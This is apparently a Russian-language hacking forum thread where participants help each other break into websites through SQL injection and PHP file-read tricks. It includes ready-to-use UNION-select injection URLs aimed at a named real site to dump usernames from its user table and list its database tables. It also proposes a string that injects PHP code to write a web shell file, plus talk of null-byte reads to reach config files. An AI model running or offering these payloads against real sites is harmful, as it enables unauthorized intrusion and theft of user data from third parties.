1. Открывать коммент там и не надо, тк запрос тупо SELECT * FROM news_posts WHERE news_id =$id 2. ElteRUS, доступ к cpg_users есть, просто бд надо писать имя бд прописью, а не капсом http://teambuilding-extreme.com/news/login.php?id=-1+union+select+1,2,3,user_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+koleshev_1.cpg_users Для подтверждения: http://teambuilding-extreme.com/news/login.php?id=1+union+select+1,2,3,concat_ws(0x2F,TABLE_NAME,TABLE_SCHEMA,database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+information_schema.TABLES+where+TABLE_SCHEMA=database()+AND+TABLE_NAME+like+0x257573657225+limit+3,1 А не выдает ничего, потому что таблица пустая. Попробуйте у себя на локалхосте выполнить SELECT 1,2,3 FROM information_schema.VIEWS все сразу вам понятно станет.
как я понял почитав кусочек статьи "--" это типа обозначение комента (то есть отбрасывает все что после него) Но зачем он нужен все таки не понятно!
Смотри, может быть запрос вида Если будет такой запрос - мускуль выдаст ошибку, потому что посчитает news_name лишним, а если поставить запрос так то news_name = $name считатся не будет. Это пример =)
если имеется в виду XSS, то нет. Но если $style_text впоследствии попадает в SQL-запрос, то фильтрация с помощью htmlspecialchars() не спасет от SQL-инъекций. Используй mysql_(real_)*escape_string()
procedure, попробуй так (не уверен). PHP: $str=");$f=fopen('shell.php','a+');fwrite($f,'<? shellcode ?>')//"; file_get_contents(./docs/danger $str /body.html); Если не стоит htmlspecialchars, получится вида PHP: file_get_contents(./docs/danger );$f=fopen('shell.php','a+');fwrite($f,'<? shellcode ?>')// /body.html);
чо, с ума сошёл? оч смешно .. за шутку +5 ---- 2 procedure если можно юзать нулевой байт, можно прочитать интересные файлы, в том числе возможно и конф итд .. а там и до шелла недалеко.. конечно это смотря что происходит с этим file_get_contents, если выводится итд, то гут..
mailbrush ))) Все на страницу выводится, параметр get. А где можно прочитать про null байт? sabe бля сегодня день рождения у webkillá что все ведут себя так? )
а это что ещё??? там что, сказано что этот file_get_contents исполняется? там макс что можно, это прочитать файлы.. если хватит конфигов, да и если вывод есть..
тут надо уточнить, если параметры пришедшие из вне вставляються в гверю без кавычек то то есть например $sql="SELECT `password` FROM user where id =".mysql_real_escape_string($_GET['user'])."LIMIT 1"; все равно уязвим.
159932, а что ты ржешь? Я не думал что у него стр идет гетом или постом,а думал что он тупо может ею управлять =\
hi sorry for my language what to do with this Microsoft JET Database Engine error '80040e10' No value given for one or more required parameters. /store/ancillary.asp, line 17 thanx
Нулл байт экранируется, включена маджик квот. AHMED HASSAN Официальный язык форума Русский, будь добр, пользуйся онлайн переводчиками (хотя-бы), или задавай вопросы в английском разделе. Official language a forum Russian, if you please, use online translators , or ask questions in English section. По поводу вопроса: это Access http://forum.antichat.ru/thread50550.html
даже если имеется возможность назначить собственное значение для $str, это никак не позволит выполнить код в file_get_contents(), как было предложено тобой. @AkyHa_MaTaTa без кавычек
